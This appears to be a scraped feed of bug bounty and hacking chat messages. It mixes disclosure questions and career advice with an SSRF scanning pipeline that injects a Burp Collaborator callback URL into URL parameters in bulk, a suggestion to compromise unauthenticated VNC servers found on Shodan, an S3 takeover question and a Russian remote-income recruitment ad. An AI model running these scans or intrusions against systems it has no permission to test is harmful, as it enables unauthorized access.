i found a sensitive exposure bug on a web server .. and the organization that is link to the server doesn't reply my email .. how do i do it ??
Читать полностью…if you started this journey you can't know the time you'll get your first bounty some people it took for them a year or more and others just some days it's more about if you love this field or not and surely you will get exhausted in the middle of the way because of the pressure that's why people often take it just as a part-time.
Читать полностью…Веду поиск людей, заинтересованных в дополнительном доходе на удаленке. Частичная занятость, от 18 лет.
Кoму интереснo - стaвьте + в личные сoобщения.
Cehv12 is a very bad course not alot of companies are looking for ethical hacking its not important anymore
Читать полностью…I am new to bug bounty. What do you advise me to learn without learning programming
Читать полностью…i hav the complete information which i don't want to share here , i already report to hackerone disclosure assistance but no response as of yet .. anything i could do ?? please help
Читать полностью…can i learn hacking for 2 or 3 months and then make money? because I come from a poor family, money is very important to me😢
Читать полностью…Bug Bounty Tips!!! 😎😎😎👌👌👌👌
SSRF on Steroids 🔥🔥☄️☄️☄️☄️☄️
Methodology
Step 1: Subdomain Enumeration
•DNS Dumpster
•Sublist3r
•Amass
•Google Dorking
•Certificate Transparency Logs
•subdomainer
Step 2: Find Live Domains
cat all-domains.txt | httpx > all-live.txt
Step 3: Identify All URLs
cat all-live.txt | gauplus -subs -b png,jpg,gif,jpeg,swf,woff,gif,svg -o allUrls.txt
Step 4: Injection Burp Collaborator URL in Parameters
cat /home/casperino/tools/nuclei/httpx.txt | grep "=" | ./qsreplace 40ga7gynfy6pcg06ov.oastify.com > ssrf.txt
Step 5: Test for SSRF Vulnerabilities
cat ssrf.txt | httpx -fr
Step 6: How to check which URL is vulnerable
split -l 10 ssrf.txt output_file_
Soc Analyst
Splunk Admin
Ibm Qradar Admin
Videos docs and interview questions
Available
Or you can find VNC's that have no authentication on shodan and you can compromise
Читать полностью…Guys, how do you decide what subdomains to attack? Let's say your target is indrive and that has about 1000+ subdomains. How Do you decide which ones to test, and which bugs for specific subdomain.
Читать полностью…hello guys, i just registered an aws s3 bucket but i cant find the vuln region hence the takeover is incomplete, what can i do here
Читать полностью…